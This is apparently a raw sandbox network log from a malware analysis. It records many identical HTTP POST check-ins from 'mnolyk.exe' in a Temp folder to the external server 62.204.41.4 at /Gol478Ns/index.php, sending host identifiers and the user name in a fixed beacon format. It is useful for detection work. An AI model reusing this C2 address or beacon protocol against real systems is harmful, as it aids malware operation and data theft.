Feb 7, 2023 19:57:36.603813887 CET	318	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:36.669253111 CET	318	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.2.5	49822	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:36.840229988 CET	319	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:36.904748917 CET	319	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.2.5	49823	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:37.077825069 CET	320	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:37.142604113 CET	320	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.2.5	49824	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:37.320313931 CET	321	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:37.382478952 CET	321	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.2.5	49825	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:37.561460018 CET	322	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:37.627032042 CET	322	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.2.5	49826	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:37.847264051 CET	323	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:37.912981033 CET	323	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	192.168.2.5	49827	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:38.087800026 CET	324	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:38.152734041 CET	324	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49709	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:08.852067947 CET	108	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:08.917759895 CET	108	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	192.168.2.5	49828	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:38.323715925 CET	325	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:38.388828039 CET	325	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.2.5	49829	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:38.585639954 CET	326	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:38.651691914 CET	326	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.2.5	49830	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:38.830730915 CET	327	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:38.897277117 CET	327	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.2.5	49831	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:39.071347952 CET	328	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:39.137352943 CET	328	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.2.5	49832	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:39.308335066 CET	329	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:39.373730898 CET	329	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.2.5	49833	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:39.543462992 CET	330	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:39.610179901 CET	330	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.2.5	49834	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:39.774939060 CET	331	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:39.839162111 CET	331	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.2.5	49835	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:40.026952028 CET	332	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:40.092897892 CET	332	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.2.5	49836	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:40.268244028 CET	333	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:40.333790064 CET	333	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.2.5	49837	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:40.510394096 CET	334	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:40.574373007 CET	334	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49710	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:09.099241018 CET	109	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:09.165880919 CET	109	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.2.5	49838	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:40.748972893 CET	335	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:40.813787937 CET	335	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.2.5	49839	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:41.005569935 CET	336	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:41.072668076 CET	336	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	192.168.2.5	49840	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:41.244153023 CET	337	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:41.309442043 CET	337	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
